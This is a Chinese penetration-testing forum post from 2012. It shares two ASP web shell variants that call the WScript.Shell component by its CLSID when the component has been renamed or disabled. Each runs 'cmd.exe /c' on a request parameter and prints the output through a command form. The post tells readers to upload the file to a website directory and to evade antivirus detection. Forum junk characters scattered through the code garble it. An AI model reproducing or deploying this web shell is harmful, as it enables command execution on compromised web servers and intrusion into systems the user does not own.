找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
返回列表 发新帖
查看: 3086|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。0 o' D1 a+ w$ n! ?
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。& S4 z/ z9 q% F' @9 h
  • 要想让运行命令可以试试这种方法,成功率为五五之数。
    8 L; O! d' {2 v) `+ O
  • 把下面代码复制:
    / j- z- {& M8 m# D8 }$ P  q
  • <%- n: K2 @6 ]9 `5 _' u& A# \, M* g
  • end if
    . }9 d) h* N! Q3 u( h0 U
  • response.write(”")6 M/ ^. N+ f0 Z, x! w
  • On Error Resume
    + r7 t0 T/ y2 {. E, y. T
  • Next( y5 }$ d$ A9 m" n5 p! r
  • response.write oScriptlhn.exec(”cmd.exe /c” &
    * H% A2 F9 D1 p& ?: |, x
  • request(”c”)).stdout.readall! s" F9 x$ E, j# M: O9 }
  • response.write(”")
    " j) R, \1 s6 |9 }# w" L" @0 `/ V) h6 n
  • response.write(”")! p+ x* m; g, [$ q) \
  • response.write(”
    " }. I) g+ z( V+ r+ k4 z; @
  • “)
    2 _! Z9 n' E9 a
  • response.write(”")
    & _' \# T8 s5 }! w1 a$ ]
  • %>2 s3 q6 u2 F7 L
  • 保存为一个asp文件,然后传到网站目录上去/ H8 n- c! g. a. Z; |" v! \
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。- b8 F1 U. Q, g3 D
  • 我用此成功运行过cacls命令。
    2 U3 @' L& g' m5 t: p' }: C
  • 第二那就是运行时出错,可能限制某些代码执行
    ! d: M$ N% i5 @' b
  • 无wscript.shell组件提权又一个方法, G1 a* |2 o$ x; Y
  • <object runat=server id=oScriptlhn scope=page
    9 K- ?8 s5 q$ ?  H+ J7 v; ^
  • - U! Y9 C# X& }& n: [; b) L
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>4 ]) m: t3 s6 F$ [
  • <%if err then%> ! Y) ~" Z) J% o, _: o) _
  • <object runat=server id=oScriptlhn scope=page $ }! z* S* g* k, b8 b
  • 0 @) t. V! w! m  |6 n, p
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
    $ ~; |" D1 A3 O1 t( H/ P
  • <%
    $ x* g6 P4 S/ P, L
  • end if ) {: G( L( s( B
  • response.write(”<textarea readonly cols=80
    # ~6 R% d( m3 f: ?( f

  • : H" s  p! {7 j8 |. I# F+ H
  • rows=20>”) ( h+ S3 p8 ~, W2 |8 X
  • On Error Resume Next 5 _- ^' ~1 C6 W; L( Y/ B0 [; v1 l2 F
  • response.write 9 D- E) h0 L- j9 M
  • 7 {8 P6 ~. J& g7 j1 n% S. A1 @" s
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    - e7 \9 \) Q9 I9 ]) I* S
  • response.write(”</textarea>”) / n0 y' W/ V/ V# |6 W# X
  • response.write(”<form 2 G0 j- C8 D% I- l% J9 K

  • 3 R3 Y! |* O2 X+ a( f6 @
  • method=’post’>”)
      V  `1 W/ Z9 m! s
  • response.write(”<input type=text name=’c' : I$ q  b5 N5 \  R* K, ^
  • : M9 C3 b" Y/ h0 m: y* x4 i
  • size=60><br>”)
    ! A# s" {4 a# I$ c  N
  • response.write(”<input type=submit 9 H, R, T# e% f$ E" G+ P% g9 T+ T
  • 1 n# }3 A9 C7 W: s
  • value=’执行’></form>”)
    ' d7 n' {* Z9 F
  • %>. y! f$ R( h. ^" T
  • 保存为ASP,此代码可能被杀,请注意免杀。9 _( }/ b, x7 S# J) X% h
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    ( z, K' S- N+ Y, X( o. m! C
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表